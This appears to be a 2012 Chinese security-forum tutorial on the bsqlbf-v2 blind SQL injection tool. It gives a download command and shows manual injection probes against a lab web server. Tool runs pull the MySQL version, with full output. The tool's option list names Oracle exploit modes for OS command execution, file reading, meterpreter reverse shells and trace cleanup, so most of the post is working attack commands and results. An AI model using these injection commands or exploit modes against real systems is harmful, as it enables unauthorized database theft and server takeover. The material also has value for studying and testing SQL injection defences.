切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
331 Blind Sql Injection bsqlbf-v2[复制链接]
发表于 2012-10-21 23:21:30 | 显示全部楼层 |!read_mode!
介绍

bsqlbf是一款由perl脚本开发SQL盲注入利用工具,它可以接受命令行参数进行自定义的SQL查询,支持字符型和数字型SQL注入,支持的数据库有:MS-SQL, MySQL,PostgreSQL和 Oracle.2.7版

下载
  1. root@Dis9Team:/pen/sql# wget http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2-7.pl
复制代码
用法

先确定一个URL是否有注入点

  1. root@Dis9Team:/pen/sql# GET http://192.168.71.130/pen/news.php?id=1%27
  2. invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  3. statement: SELECT * from stuff where id = 1'
  4. root@Dis9Team:/pen/sql# GET "http://192.168.71.130/pen/news.php?id=1 and 1=2"
  5.    
  6. root@Dis9Team:/pen/sql# GET "http://192.168.71.130/pen/news.php?id=1 and 1=1"
  7. hacked By helen  
  8. root@Dis9Team:/pen/sql#
复制代码
确定关键字是helen 提交方式是GET ,参数ID 数据库是MYSQL 测试一下指定数据库:
  1. -database:        Backend database:
  2.         0:        MS-SQL (Default)
  3.         1:        MYSQL
  4.         2:        POSTGRES
  5.         3:        ORACLE
复制代码
指定关键字-match指定查询参数-blind指定数据库操作-sql构造语句
  1. root@Dis9Team:/pen/sql# perl bsqlbf-v2-7.pl -url http://192.168.71.130/pen/news.php?id=1 -blind id -match "helen" -sql "version()"  -database 1

  2. // Blind SQL injection brute forcer \\
  3. //originally written by...aramosf@514.es  \\

  4. // mofified by sid-at-notsosecure.com \\
  5. // http://www.notsosecure.com \\
  6. --[ http options ]--------------------------------------------------------------
  7.      schema: http           host: 192.168.71.130      
  8.      method: GET       useragent: bsqlbf 2.7         
  9.        path: /pen/news.php                                    
  10.      arg[1]: id              = 1                                       
  11.     cookies: (null)                                            
  12. proxy_host: (null)                                            
  13.        time: 0 sec (default)                                   


  14. Finding Length of SQL Query....

  15. --[ blind sql injection options ]-----------------------------------------------
  16.       blind: id                   start: (null)              
  17.    database: 1                     type: 0                  
  18.      length: 27bytes                sql: version()           
  19. match: helen
  20. --------------------------------------------------------------------------------


  21. Getting Data...
  22. results:buntu0.10.10.1-log
  23. version() = 5.1.61-0ubuntu0.10.10.1-log
复制代码
指定注入类型
  1. -type:                Type of injection:
  2.         0:        Type 0 (default) is blind injection based on True and False responses
  3.         1:        Type 1 is blind injection based on True and Error responses
  4.         2:        Type 2 is injection in order by and group by
  5.         3:        Type 3 is extracting data with SYS privileges[ORACLE dbms_export_extension exploit]
  6.         4:        Type 4 is O.S code execution [ORACLE dbms_export_extension exploit]
  7.         5:        Type 5 is reading files [ORACLE dbms_export_extension exploit, based on java]

  8.         6:        Type 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]
  9.         7:        Type 7 is O.S code execution [ORACLE SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs]
  10.                  -cmd=revshell [Type 7 supports meterpreter payload execution, run generator.exe first]
  11.                  -cmd=cleanup [run this after exiting your metasploit session, it will clean up the traces]
  12.         8:        Type 8 is O.S code execution [ORACLE DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions]
  13.                  -cmd=revshell [Type 8 supports meterpreter payload execution, run generator.exe first]
复制代码


例如:
  1. root@Dis9Team:/pen/sql# perl bsqlbf-v2-7.pl -url http://192.168.71.130/pen/news.php?id=1 -blind id -match "helen" -sql "version()"  -database 1 -type 1

  2. // Blind SQL injection brute forcer \\
  3. //originally written by...aramosf@514.es  \\

  4. // mofified by sid-at-notsosecure.com \\
  5. // http://www.notsosecure.com \\
  6. --[ http options ]--------------------------------------------------------------
  7.      schema: http           host: 192.168.71.130      
  8.      method: GET       useragent: bsqlbf 2.7         
  9.        path: /pen/news.php                                    
  10.      arg[1]: id              = 1                                       
  11.     cookies: (null)                                            
  12. proxy_host: (null)                                            
  13.        time: 0 sec (default)                                   


  14. Finding Length of SQL Query....

  15. --[ blind sql injection options ]-----------------------------------------------
  16.       blind: id                   start: (null)              
  17.    database: 1                     type: 1                  
  18.      length: 27bytes                sql: version()           
  19. match: helen
  20. --------------------------------------------------------------------------------


  21. Getting Data...
  22. results:buntu0.10.10.1-log
  23. version() = 5.1.61-0ubuntu0.10.10.1-log
  24. root@Dis9Team:/pen/sql#
复制代码
参考:






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-29 21:28

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部